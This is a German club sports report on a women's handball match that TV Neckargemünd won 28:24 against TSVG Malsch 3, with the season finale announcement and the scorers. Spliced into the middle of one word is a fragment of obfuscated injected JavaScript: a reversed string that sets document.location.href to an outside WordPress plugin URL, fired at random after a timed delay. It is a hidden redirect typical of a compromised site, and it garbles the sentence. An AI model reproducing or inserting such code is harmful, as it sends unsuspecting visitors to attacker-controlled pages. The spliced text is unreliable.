Am Donnerstag, den 14.04.16 erwarteten die Damen des TV Neckargemünd die Mannschaft vom TSVG Malsch 3. Das kräfteraubende Hinspiel wurde mit drei Toren verloren. Spätestens beim Aufwärmen war jeder heimischen Spielerin klar, dass das Spiel mindestens genauso anstrengend wird.
Neckargemünd, 15.04.16 (kkn) – Überraschend starteten die Damen des TVN in das Spiel. Die Abwehr stand kompakt. Einige Bälle konnten ergattert und per Tempogegenstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toß verwandelt werden, so dass es in der 9. Spielminute 8:1 stand. Hochkonzentriert und motiviert konnten die Damen des TVN den Torestand bis zur 16. Spielminute, auf 12:4, ausbauen. Plötzlich hatte die Heimmannschaft den gegnerischen Angriff nicht mehr unter Kontrolle und die Gegner konnten Tor um Tor aufholen. Durch das schnelle Spiel fehlte wohl die Kraft, viele Bälle wurden im Angriff verloren und es ging mit 16:12 in die Halbzeitpause.
Die Damen des TVN blockten, irgendwas lief plötzlich schief. Die Malscher verkürzten den Abstand immer mehr und so sah man in der 40. Spielminute einen Spielstand von 20:20. Dann legte sich der Schalter wieder um, der Siegeswillen war wieder da und die Neckargemünder Damen konnten ab der 52. Spielminute den 4-Tore Abstand halten. 28:24 Spielende.
Das letzte Spiel der Saison findet am Sonntag, den 24.04.16 um 15:00 Uhr in der Münzenbachhalle statt. Zu Gast wird der Tabellennachbar aus Kirchheim sein, das Hinspiel konnte knapp mit einem Tor gewonnen werden. Die Damen des TVN hoffen und freuen sich auf eine volle Tribüne!
Es spielten:
Im Tor: Mulawa
Auf dem Feld: Koch (15/4), Lehr, Knauf (3), Gößmann (2), Maier (4), Ebert (1), Pabst, Klingenberg, Weitzel, Bucher (3)